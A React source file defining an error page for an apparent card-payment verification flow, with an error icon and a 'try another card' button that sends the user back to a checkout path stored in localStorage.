import React from 'react';
import { useNavigate } from 'react-router-dom';
import StandardLayout from './StandardLayout';
import { t } from '../utils/i18n';

export const ErrorPage = () => {
  const navigate = useNavigate();

  const handleRetry = () => {
    const geo = localStorage.getItem('geo') || 'vn';
    const checkoutPath = localStorage.getItem('checkout_path') || `/${geo}/homepage`;
    navigate(checkoutPath);
  };

  return (
    <StandardLayout title={t('errorTitle')} subtitle={t('errorSubtitle')}>
      <div style={{ textAlign: 'center', padding: '8px 0 4px' }}>
        <div
          style={{
            width: '48px',
            height: '48px',
            borderRadius: '50%',
            background: '#fff5f5',
            color: '#e53e3e',
            display: 'inline-flex',
            alignItems: 'center',
            justifyContent: 'center',
            fontSize: '24px',
            fontWeight: 700,
            marginBottom: '16px',
          }}
        >
          ✕
        </div>
        <button
          type="button"
          className="threeds-submit-btn"
          onClick={handleRetry}
        >
          {t('tryAnotherCard')}
        </button>
      </div>
    </StandardLayout>
  );
};

export default ErrorPage;
